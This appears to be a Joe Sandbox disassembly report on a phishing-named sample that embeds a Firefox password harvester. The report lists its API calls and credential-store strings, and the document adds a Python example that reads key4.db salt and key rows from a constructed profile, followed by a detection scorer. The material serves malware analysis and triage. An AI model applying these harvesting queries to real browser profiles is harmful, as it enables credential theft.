                                                                                                                                                                                                                                          • EndDialog.USER32(?,?), ref: 0040FC88
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 0040FCA0
                                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040FCBF
                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040FCCC
                                                                                                                                                                                                                                          • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040FCD5
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040FCFD
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040FD1D
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040FD3B
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040FD54
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040FD72
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040FD8B
                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 0040FD93
                                                                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040FDB8
                                                                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040FDEE
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040FE45
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 0040FE53
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00457E70,00000118), ref: 0040FE82
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,00000000), ref: 0040FEA4
                                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040FF0F
                                                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040FF28
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 0040FF32
                                                                                                                                                                                                                                          • SetFocus.USER32(00000000), ref: 0040FF39
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • {Unknown}, xrefs: 0040FD02
                                                                                                                                                                                                                                          • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040FF09
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                                                                                                                                                                                                          • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                                                                                                                                                                          • API String ID: 1428123949-3474136107
                                                                                                                                                                                                                                          • Opcode ID: de300881e20ea23b7bb50552807e946df4066f391255ce58fe159596e1188ae6
                                                                                                                                                                                                                                          • Instruction ID: dbacf55a19a30e1480a431b78f30a2e126a23dc86512cc8492e46cc2065c5524
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: de300881e20ea23b7bb50552807e946df4066f391255ce58fe159596e1188ae6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6371A972808345BFE7319B51EC41EDB7B9CFB84345F04043AF644921A2DA79DE49CB6A
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                                                                                                                                          • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                                                                                                                                          • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 0040121A
• DeleteObject.GDI32(?), ref: 00401226
• GetDlgItem.USER32(?,000003ED), ref: 0040124A
• ShowWindow.USER32(00000000), ref: 00401253
• GetDlgItem.USER32(?,000003EE), ref: 0040125F
• ShowWindow.USER32(00000000), ref: 00401262
• SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
• memset.MSVCRT ref: 0040128E
• SetWindowTextA.USER32(?,00000000), ref: 004012AA
• SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
• SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
• String ID:
• API String ID: 2998058495-0
• Opcode ID: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
• Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
• Opcode Fuzzy Hash: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
• Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
APIs
  • Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
  • Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B
• SetMenu.USER32(?,00000000), ref: 0040BD23
• SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
• LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
• CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
• LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
• _strcmpi.MSVCRT ref: 0040BE93
• RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
• SetFocus.USER32(?,00000000), ref: 0040BECE
• GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
• GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
• strlen.MSVCRT ref: 0040BEFE
• strlen.MSVCRT ref: 0040BF0C
• RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68
  • Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
  • Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8
• SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
• SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
• memset.MSVCRT ref: 0040BFDB
• SetWindowTextA.USER32(?,?), ref: 0040BFFF
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
• String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
• API String ID: 2303586283-933021314
• Opcode ID: ee83ce8392c91b6a1376ce061df6a688643c70b4fadf0565b78a002f471a3540
• Instruction ID: 018683a0c001df71ea8fb117e25ab04faf3265e4b472b332b07084323bdedb2f
• Opcode Fuzzy Hash: ee83ce8392c91b6a1376ce061df6a688643c70b4fadf0565b78a002f471a3540
• Instruction Fuzzy Hash: 5DC1C071644388FFEB15DF64CC45BDABBA5FF14304F04016AFA44A7292C7B5A904CBA9
APIs
• memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
• memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
• memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
• memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
• memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
• memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
• memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memcmp$memcpy
• String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
• API String ID: 231171946-2189169393
• Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
• Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
• Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
• Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: _mbscat$memsetsprintf$_mbscpy
• String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
• API String ID: 633282248-1996832678
• Opcode ID: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
• Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
• Opcode Fuzzy Hash: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
• Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
APIs
• memset.MSVCRT ref: 00406782
  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
• memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
• memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
• memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
• memcpy.MSVCRT(?,?,00000010), ref: 004068BA
• memcpy.MSVCRT(?,?,00000010), ref: 004068D3
• memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
• memcpy.MSVCRT(?,00000015,?), ref: 00406908
• memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
• memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
• memcpy.MSVCRT(?,00000023,?), ref: 00406A03
• memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
• memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
• memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
• memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
• memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
Strings
• SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
• , xrefs: 00406834
• SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                                                                                                                                                                          • key4.db, xrefs: 00406756
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$memcmp$memsetstrlen
                                                                                                                                                                                                                                          • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                                                                                                                                                          • API String ID: 3614188050-3983245814
                                                                                                                                                                                                                                          • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                                                                                                                          • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040A973
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040A996
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040A9AC
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040A9BC
                                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040A9F0
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(00000000, nowrap), ref: 0040AA37
                                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040AABE
                                                                                                                                                                                                                                          • _mbscat.MSVCRT ref: 0040AAED
                                                                                                                                                                                                                                            • Part of subcall function 00410FD3: sprintf.MSVCRT ref: 00410FF7
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?), ref: 0040AAD2
                                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040AB21
                                                                                                                                                                                                                                            • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                                                                            • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,76940A60,00000000,?,?,0040A7BE,00000001,0044CBC0,76940A60), ref: 00406D4D
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                                                                                                                                                                          • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                                                          • API String ID: 710961058-601624466
                                                                                                                                                                                                                                          • Opcode ID: c33c3296b7e77e76534675bd69894b8e30877f2258b439036e8e249278821d93
                                                                                                                                                                                                                                          • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c33c3296b7e77e76534675bd69894b8e30877f2258b439036e8e249278821d93
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: sprintf$memset$_mbscpy
                                                                                                                                                                                                                                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                                                          • API String ID: 3402215030-3842416460
                                                                                                                                                                                                                                          • Opcode ID: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                                                                                                                                                          • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                                                                                                                                                            • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                                                                                                                                                                            • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                                                                                                                                                            • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                                                                                                                                                            • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                                                                                                                                                            • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                                                                                                                                                            • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                                                                                                                                                            • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                                                                                                                                                            • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                                                                                                                                            • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                                                                                                                                            • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040F139
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040F147
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040F187
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040F196
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040F1A4
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040F1EA
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040F1F9
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040F207
                                                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                                                                                                                                                            • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                                                                            • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                                                                                                                                                          • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                                                                                                                                          • API String ID: 2003275452-3138536805
                                                                                                                                                                                                                                          • Opcode ID: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                                                                                                                                                                          • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
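The two function blocks above that reference key4.db (xrefs 00406756, 004067C4, 00406933) and logins.json / signons.sqlite / signons.txt together with nss3.dll and sqlite3.dll (xrefs 0040F113 through 004070EB) are the Firefox credential-store access path of the embedded password-recovery code. The following Python is an added example, not part of the Joe Sandbox report and not code recovered from the sample. On constructed data it shows which profile artifacts such a harvester touches by issuing the exact two SQL statements listed in the String IDs above, and it turns the same string cluster into a triage score for a memory region. The key4.db schema is reduced to the columns those queries name, all blob values are placeholders, and the 16-byte CKA_ID f8...01 is the well-known NSS identifier of the default key; which row the sample itself selects is not asserted here. Because the strings were recovered from the memory dump source listed above rather than from the packed file, the score should be run over a process dump, not over the on-disk sample.

```python
"""
Added example (not from the Joe Sandbox report, not code recovered from the
sample). On constructed data it shows what a Firefox credential harvester reads
and turns the report's string cluster into a triage check.
"""
import json
import sqlite3
import tempfile
from pathlib import Path

# Exact SQL strings from the xrefs above (004067C4 and 00406933).
METADATA_QUERY = "SELECT item1,item2 FROM metadata WHERE id = 'password'"
NSSPRIVATE_QUERY = "SELECT a11,a102 FROM nssPrivate"

# File and module names from the String IDs above.
PROFILE_FILES = ("key4.db", "logins.json", "signons.sqlite", "signons.txt")
HELPER_DLLS = ("nss3.dll", "sqlite3.dll")

# In a real key4.db: metadata.item1 = global salt, metadata.item2 = encrypted
# password-check blob, nssPrivate.a11 = encrypted master key, nssPrivate.a102 =
# CKA_ID. f8...01 is NSS's well-known ID for the default key.
CKA_ID_DEFAULT = bytes.fromhex("f8000000000000000000000000000001")
CONSTRUCTED_GLOBAL_SALT = bytes(range(20))          # constructed; real salts are 20 bytes
CONSTRUCTED_PW_CHECK = b"\x30\x00" + b"\xaa" * 30   # constructed placeholder, not valid ASN.1
CONSTRUCTED_ENC_KEY = b"\x30\x00" + b"\xbb" * 40    # constructed placeholder, not key material


def build_profile(root: Path) -> Path:
    """Create a constructed Firefox-style profile directory under root."""
    prof = root / "abcd1234.default-release"   # constructed profile name
    prof.mkdir(parents=True, exist_ok=True)
    con = sqlite3.connect(str(prof / "key4.db"))
    # Reduced schema: only the columns the two queries reference.
    con.executescript(
        "CREATE TABLE metadata (id TEXT PRIMARY KEY, item1 BLOB, item2 BLOB);"
        "CREATE TABLE nssPrivate (id INTEGER PRIMARY KEY, a11 BLOB, a102 BLOB);"
    )
    con.execute("INSERT INTO metadata VALUES (?,?,?)",
                ("password", CONSTRUCTED_GLOBAL_SALT, CONSTRUCTED_PW_CHECK))
    con.execute("INSERT INTO nssPrivate (a11, a102) VALUES (?,?)",
                (CONSTRUCTED_ENC_KEY, CKA_ID_DEFAULT))
    con.commit()
    con.close()
    # logins.json carries per-site ciphertexts; the values here are constructed.
    (prof / "logins.json").write_text(json.dumps({"logins": [{
        "hostname": "https://example.invalid",
        "encryptedUsername": "constructed-base64",
        "encryptedPassword": "constructed-base64",
    }]}))
    return prof


def harvest_like_sample(profile: Path) -> dict:
    """Read what the strings above name: profile files, then the two key4.db queries."""
    found = [n for n in PROFILE_FILES if (profile / n).exists()]
    con = sqlite3.connect(str(profile / "key4.db"))
    try:
        global_salt, pw_check = con.execute(METADATA_QUERY).fetchone()
        keys = con.execute(NSSPRIVATE_QUERY).fetchall()
    finally:
        con.close()
    # Decryptors pick the nssPrivate row whose CKA_ID is the default key id.
    enc_master_key = next((a11 for a11, a102 in keys if a102 == CKA_ID_DEFAULT), None)
    logins = []
    if "logins.json" in found:
        logins = json.loads((profile / "logins.json").read_text())["logins"]
    return {"files": found, "global_salt": global_salt, "pw_check": pw_check,
            "enc_master_key": enc_master_key, "login_count": len(logins)}


def demo_harvest() -> dict:
    """Build a throwaway constructed profile and harvest it."""
    with tempfile.TemporaryDirectory() as tmp:
        return harvest_like_sample(build_profile(Path(tmp)))


INDICATORS = PROFILE_FILES + HELPER_DLLS + (METADATA_QUERY, NSSPRIVATE_QUERY)


def harvester_score(blob: bytes) -> tuple:
    """Count indicator strings present in blob, in ANSI or UTF-16LE form."""
    hits = [s for s in INDICATORS
            if s.encode("ascii") in blob or s.encode("utf-16-le") in blob]
    return len(hits), hits


# Constructed stand-in for an unpacked memory region: filler around the
# indicators, alternating ANSI and UTF-16LE encodings.
CONSTRUCTED_DUMP = (b"\x00MZ\x90\x00"
                    + b"\x00".join(s.encode("utf-16-le") if i % 2 else s.encode("ascii")
                                   for i, s in enumerate(INDICATORS))
                    + b"\x00" * 16)

if __name__ == "__main__":
    print(demo_harvest())
    print(harvester_score(CONSTRUCTED_DUMP))
```

The harvest half lists the file-access and SQL footprint an analyst can look for in profile directories and in file-access telemetry; the score half is a triage aid only, since the same strings occur in legitimate password-recovery utilities and in Firefox itself, so a high count means "contains a Firefox credential reader", not "is malicious".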
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040C3F7
                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                                                                                                                                                          • strrchr.MSVCRT ref: 0040C417
